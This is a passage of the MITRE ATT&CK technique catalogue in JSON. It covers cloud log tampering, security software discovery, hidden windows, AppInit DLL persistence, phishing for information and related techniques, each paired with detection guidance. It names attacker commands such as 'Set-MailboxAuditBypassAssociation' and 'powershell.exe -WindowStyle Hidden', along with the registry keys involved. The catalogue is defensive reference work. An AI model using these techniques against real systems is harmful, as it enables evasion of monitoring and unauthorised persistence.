"mitre-attack", "url": "https://attack.mitre.org/techniques/T1557/002", "external_id": "T1557.002"}, {"source_name": "Cylance Cleaver", "description": "Cylance. (2014, December). Operation Cleaver. Retrieved September 14, 2017.", "url": "https://web.archive.org/web/20200302085133/https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf"}, {"source_name": "RFC826 ARP", "description": "Plummer, D. (1982, November). An Ethernet Address Resolution Protocol. Retrieved October 15, 2020.", "url": "https://tools.ietf.org/html/rfc826"}, {"source_name": "Sans ARP Spoofing Aug 2003", "description": "Siles, R. (2003, August). Real World ARP Spoofing. Retrieved October 15, 2020.", "url": "https://pen-testing.sans.org/resources/papers/gcih/real-world-arp-spoofing-105411"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-12T21:13:56.431Z", "name": "Disable or Modify Cloud Logs", "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.\n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality \u2013 for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user\u2019s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Syed Ummar Farooqh, McAfee", "Prasad Somasamudram, McAfee", "Sekhar Sarukkai, McAfee", "Ibrahim Ali Khan", "Alex Soler, AttackIQ", "Janantha Marasinghe", "Matt Snyder, VMware", "Joe Gumke, U.S. Bank"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor logs for API calls to disable logging. In AWS, monitor for: StopLogging and DeleteTrail.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: google.logging.v2.ConfigServiceV2.UpdateSink.(Citation: Configuring Data Access audit logs) In Azure, monitor for az monitor diagnostic-settings delete.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS", "SaaS", "Google Workspace", "Azure AD", "Office 365"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d", "created": "2020-10-12T13:52:32.846Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1562/008", "external_id": "T1562.008"}, {"source_name": "Stopping CloudTrail from Sending Events to CloudWatch Logs", "description": "Amazon Web Services. (n.d.). Stopping CloudTrail from Sending Events to CloudWatch Logs. Retrieved October 16, 2020.", "url": "https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html"}, {"source_name": "AWS Update Trail", "description": "AWS. (n.d.). update-trail. Retrieved August 4, 2023.", "url": "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html"}, {"source_name": "Following the CloudTrail: Generating strong AWS security signals with Sumo Logic", "description": "Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.", "url": "https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/"}, {"source_name": "Configuring Data Access audit logs", "description": "Google. (n.d.). Configuring Data Access audit logs. Retrieved October 16, 2020.", "url": "https://cloud.google.com/logging/docs/audit/configure-data-access"}, {"source_name": "Dark Reading Microsoft 365 Attacks 2021", "description": "Kelly Sheridan. (2021, August 5). Incident Responders Explore Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.", "url": "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591"}, {"source_name": "az monitor diagnostic-settings", "description": "Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved October 16, 2020.", "url": "https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete"}, {"source_name": "Pacu Detection Disruption Module", "description": "Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.", "url": "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T00:15:53.303Z", "name": "Security Software Discovery", "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as cloud monitoring agents and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\n\nAdversaries may also utilize the [Cloud API](https://attack.mitre.org/techniques/T1059/009) to discover cloud-native security software installed on compute infrastructure, such as the AWS CloudWatch agent, Azure VM Agent, and Google Cloud Monitor agent. These agents may collect metrics and logs from the VM, which may be centrally aggregated in a cloud-based monitoring platform.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Isif Ibrahima, Mandiant"], "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud environments, additionally monitor logs for the usage of APIs that may be used to gather information about security software configurations within the environment.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "IaaS", "Linux", "macOS"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384", "created": "2020-02-21T21:16:18.066Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1518/001", "external_id": "T1518.001"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-13T14:28:20.651Z", "name": "Hidden Window", "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.\n\nSimilarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden.(Citation: PowerShell About 2019)\n\nIn addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Travis Smith, Tripwire", "Mark Tsipershtein"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line arguments for actions indicative of hidden windows. In Windows, enable and configure event logging and PowerShell logging to check for the hidden window style. In MacOS, plist files are ASCII text files with a specific format, so they're relatively easy to parse. File monitoring can check for the apple.awt.UIElement or any other suspicious plist tag in plist files and flag them.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0", "created": "2020-03-13T20:26:49.433Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/003", "external_id": "T1564.003"}, {"source_name": "Hidden VNC", "description": "Hutchins, Marcus. (2015, September 13). Hidden VNC for Beginners. Retrieved November 28, 2023.", "url": "https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html"}, {"source_name": "Anatomy of an hVNC Attack", "description": "Keshet, Lior. Kessem, Limor. (2017, January 25). Anatomy of an hVNC Attack. Retrieved November 28, 2023.", "url": "https://securityintelligence.com/anatomy-of-an-hvnc-attack/"}, {"source_name": "Antiquated Mac Malware", "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"}, {"source_name": "PowerShell About 2019", "description": "Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved October 11, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Transmitted Data Manipulation", "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making. \n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_impact_type": ["Integrity"], "x_mitre_permissions_required": ["User", "Administrator", "root", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8", "created": "2019-04-09T16:08:20.824Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1493", "external_id": "T1493"}, {"source_name": "FireEye APT38 Oct 2018", "description": "FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.", "url": "https://content.fireeye.com/apt/rpt-apt38"}, {"source_name": "DOJ Lazarus Sony 2018", "description": "Department of Justice. (2018, September 6). Criminal Complaint - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.", "url": "https://www.justice.gov/opa/press-release/file/1092091/download"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2024-01-30T18:35:58.021Z", "name": "Python", "description": "Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020)\n\nPython comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "Windows", "macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_remote_support": false, "x_mitre_system_requirements": ["Python is installed."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1", "created": "2020-03-09T14:38:24.334Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1059/006", "external_id": "T1059.006"}, {"source_name": "Zscaler APT31 Covid-19 October 2020", "description": "Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.", "url": "https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Identify Roles", "description": "Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", "created": "2020-10-02T16:37:30.015Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1591/004", "external_id": "T1591.004"}, {"source_name": "ThreatPost Broadvoice Leak", "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2023-04-21T12:20:20.711Z", "name": "Data Encoding", "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Itzik Kotler, SafeBreach"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", "created": "2017-05-31T21:31:43.540Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1132", "external_id": "T1132"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}, {"source_name": "Wikipedia Binary-to-text Encoding", "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding"}, {"source_name": "Wikipedia Character Encoding", "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", "url": "https://en.wikipedia.org/wiki/Character_encoding"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "AppInit DLLs", "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_effective_permissions": ["Administrator", "SYSTEM"], "x_mitre_permissions_required": ["Administrator"], "x_mitre_system_requirements": ["Secure boot disabled on systems running Windows 8 and later"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", "created": "2020-01-24T14:52:25.589Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1546/010", "external_id": "T1546.010"}, {"source_name": "Elastic Process Injection July 2017", "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"}, {"source_name": "AppInit Registry", "description": "Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.", "url": "https://support.microsoft.com/en-us/kb/197571"}, {"source_name": "AppInit Secure Boot", "description": "Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.", "url": "https://msdn.microsoft.com/en-us/library/dn280412"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-09-08T20:28:49.600Z", "name": "Phishing for Information", "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Philip Winther", "Sebastian Salla, McAfee", "Robert Simmons, @MalwareUtkonos", "Ohad Zaidenberg, @ohad_mz", "Liora Itkin", "Liran Ravich, CardinalOps", "Scott Cook, Capital One"], "x_mitre_deprecated": false, "x_mitre_detection": "Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nWhen it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.\n\nMonitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", "created": "2020-10-02T17:07:01.502Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1598", "external_id": "T1598"}, {"source_name": "ACSC Email Spoofing", "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf"}, {"source_name": "Avertium callback phishing", "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.", "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing"}, {"source_name": "TrendMictro Phishing", "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.", "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html"}, {"source_name": "Sophos Attachment", "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links \u2013 when phishers bring along their own web pages. Retrieved October 20, 2020.", "url": "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/"}, {"source_name": "cyberproof-double-bounce", "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.", "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"}, {"source_name": "PCMag FakeLogin", "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.", "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages"}, {"source_name": "Microsoft Anti Spoofing", "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide"}, {"source_name": "Microsoft OAuth Spam 2022", "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.", "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/"}, {"source_name": "ThreatPost Social Media Phishing", "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.", "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/"}, {"source_name": "Proofpoint-spoof", "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.", "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing"}, {"source_name": "GitHub Phishery", "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.", "url": "https://github.com/ryhanson/phishery"}, {"source_name": "Palo Alto Unit 42 VBA Infostealer 2014", 